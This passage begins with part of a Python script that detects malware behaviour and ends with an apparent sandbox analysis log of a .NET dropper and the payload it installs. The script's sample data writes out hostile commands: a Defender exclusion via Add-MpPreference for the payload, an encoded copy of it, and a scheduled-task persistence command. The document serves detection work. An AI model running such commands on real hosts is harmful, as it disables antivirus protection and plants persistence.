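    low = [t.lower() for t in toks]
    if "add-mppreference" not in low:
        return None
    for i, t in enumerate(low):
        # -ExclusionPath / -ExclusionProcess / -ExclusionExtension, possibly abbreviated
        if t.startswith("-exclusion") and i + 1 < len(toks):
            return toks[i + 1]
    return None


TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)


def schtask_from_temp(ev: ProcEvent) -> tuple[str | None, str] | None:
    """Return (task name, xml path) when schtasks /Create reads its XML from a temp dir."""
    if not ev.image.lower().endswith("schtasks.exe"):
        return None
    toks = tokenize(ev.cmdline)
    low = [t.lower() for t in toks]
    if "/create" not in low:
        return None
    name = xml = None
    for i, t in enumerate(low):
        if t == "/tn" and i + 1 < len(toks):
            name = toks[i + 1]
        elif t == "/xml" and i + 1 < len(toks):
            xml = toks[i + 1]
    return (name, xml) if xml and TEMP_DIR.search(xml) else None


def self_spawn_chains(events: list[ProcEvent]) -> list[tuple[int, int, str]]:
    """(parent pid, child pid, image) for every child whose image equals its parent's."""
    by_pid = {e.pid: e for e in events}
    return [(e.ppid, e.pid, e.image) for e in events
            if e.ppid in by_pid and by_pid[e.ppid].image.lower() == e.image.lower()]


def analyze(events: list[ProcEvent]) -> list[dict]:
    findings = []
    for e in events:
        if (path := defender_exclusion(e)) is not None:
            findings.append({"technique": "defender_exclusion", "pid": e.pid, "detail": path})
        if (task := schtask_from_temp(e)) is not None:
            findings.append({"technique": "schtask_from_temp", "pid": e.pid, "detail": task})
    for ppid, pid, image in self_spawn_chains(events):
        findings.append({"technique": "self_spawn", "pid": pid, "detail": (ppid, image)})
    return findings


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
DROPPER = r"C:\Users\user\Desktop\vQyKfYxzXB.exe"
PAYLOAD = r"C:\Users\user\AppData\Roaming\RTdozXra.exe"

# Constructed events modelled on the report's process tree; pids and parent pids
# 1000/900 are made up. The last three rows are added controls: an encoded
# variant, a benign Defender query, and a task whose XML is not in a temp dir.
SAMPLE_EVENTS = [
    ProcEvent(7548, 1000, DROPPER, f'"{DROPPER}"'),
    ProcEvent(7612, 7548, PS, f'"{PS}" Add-MpPreference -ExclusionPath "{PAYLOAD}"'),
    ProcEvent(7700, 7548, SCHTASKS, f'"{SCHTASKS}" /Create /TN "Updates\\RTdozXra" /XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmp8902.tmp"'),
    ProcEvent(7932, 7548, DROPPER, f'"{DROPPER}"'),
    ProcEvent(7960, 1000, PS, f'"{PS}" -NoProfile -EncodedCommand ' + encode_command(f'Add-MpPreference -ExclusionPath "{PAYLOAD}"')),
    ProcEvent(8100, 1000, PS, f'"{PS}" Get-MpPreference'),
    ProcEvent(8200, 900, SCHTASKS, f'"{SCHTASKS}" /Create /TN "Backup" /XML "C:\\ProgramData\\backup.xml"'),
]
```

Run `analyze(SAMPLE_EVENTS)` and four findings come back: two Defender exclusions (the plain one from the report and the encoded control), the task created from tmp8902.tmp, and the 7548 to 7932 self-spawn; the Get-MpPreference row and the ProgramData task stay silent. On a live host the same two artefacts can be confirmed directly with `Get-MpPreference | Select-Object ExclusionPath` and `Get-ScheduledTask -TaskPath '\Updates\'`, which is worth doing because an exclusion added this way survives the process tree that created it.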
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: dwrite.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: windowscodecs.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: slc.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: vQyKfYxzXB.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: vQyKfYxzXB.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: vQyKfYxzXB.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: Zfva.pdbSHA256 source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
              Source: Binary string: Zfva.pdb source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
              Source: vQyKfYxzXB.exe | Static PE information: 0xAF38D2CF [Mon Feb 26 17:33:03 2063 UTC]
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 15_2_0041A8DA
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_059266AD push esp; iretd 0_2_059266AE
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_076D72A5 push esp; iretd 0_2_076D72B9
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D48DF9 push eax; mov dword ptr [esp], edx 0_2_08D48E0C
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D43698 push eax; ret 0_2_08D43A31
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08D44960 push eax; iretd 0_2_08D44961
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EE7968 pushfd ; ret 0_2_08EE7969
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EE7BAE pushfd ; ret 0_2_08EE7BAF
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Code function: 0_2_08EE7541 pushfd ; ret 0_2_08EE7542
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_055566AD push esp; iretd 11_2_055566AE
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_072F3698 push eax; ret 11_2_072F3A31
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_072F4960 push eax; iretd 11_2_072F4961
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_07497541 pushfd ; ret 11_2_07497542
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_074904A0 pushfd ; ret 11_2_074904A1
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_07497D0A push esp; retf 11_2_07497D31
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_07497BAE pushfd ; ret 11_2_07497BAF
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 11_2_07497968 pushfd ; ret 11_2_07497969
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004000D8 push es; iretd 15_2_004000D9
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0040008C push es; iretd 15_2_0040008D
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004542E6 push ecx; ret 15_2_004542F9
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0045B4FD push esi; ret 15_2_0045B506
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00432BD6 push ecx; ret 15_2_00432BE9
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00454C08 push eax; ret 15_2_00454C26
              Source: vQyKfYxzXB.exe | Static PE information: section name: .text entropy: 7.800755325212195
              Source: RTdozXra.exe.0.dr | Static PE information: section name: .text entropy: 7.800755325212195
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_004063C6 ShellExecuteW,URLDownloadToFileW, 15_2_004063C6
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | File created: C:\Users\user\AppData\Roaming\RTdozXra.exe

              Boot Survival

              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 15_2_00418A00

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe | Code function: 15_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 15_2_0041A8DA
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\vQyKfYxzXB.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: RTdozXra.exe PID: 8036, type: MEMORYSTR
